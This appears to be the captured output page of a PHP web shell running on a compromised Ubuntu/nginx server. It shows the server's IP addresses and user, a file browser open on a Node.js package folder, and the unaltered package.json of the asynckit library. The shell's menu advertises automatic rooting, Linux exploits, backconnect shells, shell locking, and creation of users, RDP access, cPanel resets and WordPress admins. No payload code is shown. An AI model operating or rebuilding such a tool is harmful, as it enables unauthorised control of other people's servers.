Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
asynckit /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
dr-xr-xr-x
LICENSE
1.05
KB
-rw-rw-rw-
README.md
7.46
KB
-rw-rw-rw-
bench.js
1.23
KB
-rw-rw-rw-
index.js
156
B
-rw-rw-rw-
package.json
1.57
KB
-rw-rw-rw-
parallel.js
1017
B
-rw-rw-rw-
serial.js
501
B
-rw-rw-rw-
serialOrdered.js
1.71
KB
-rw-rw-rw-
stream.js
703
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "asynckit", "version": "0.4.0", "description": "Minimal async jobs utility library, with streams support", "main": "index.js", "scripts": { "clean": "rimraf coverage", "lint": "eslint *.js lib/*.js test/*.js", "test": "istanbul cover --reporter=json tape -- 'test/test-*.js' | tap-spec", "win-test": "tape test/test-*.js", "browser": "browserify -t browserify-istanbul test/lib/browserify_adjustment.js test/test-*.js | obake --coverage | tap-spec", "report": "istanbul report", "size": "browserify index.js | size-table asynckit", "debug": "tape test/test-*.js" }, "pre-commit": [ "clean", "lint", "test", "browser", "report", "size" ], "repository": { "type": "git", "url": "git+https://github.com/alexindigo/asynckit.git" }, "keywords": [ "async", "jobs", "parallel", "serial", "iterator", "array", "object", "stream", "destroy", "terminate", "abort" ], "author": "Alex Indigo <iam@alexindigo.com>", "license": "MIT", "bugs": { "url": "https://github.com/alexindigo/asynckit/issues" }, "homepage": "https://github.com/alexindigo/asynckit#readme", "devDependencies": { "browserify": "^13.0.0", "browserify-istanbul": "^2.0.0", "coveralls": "^2.11.9", "eslint": "^2.9.0", "istanbul": "^0.4.3", "obake": "^0.1.2", "phantomjs-prebuilt": "^2.1.7", "pre-commit": "^1.1.3", "reamde": "^1.1.0", "rimraf": "^2.5.2", "size-table": "^0.2.0", "tap-spec": "^4.1.1", "tape": "^4.5.1" }, "dependencies": {} }
Close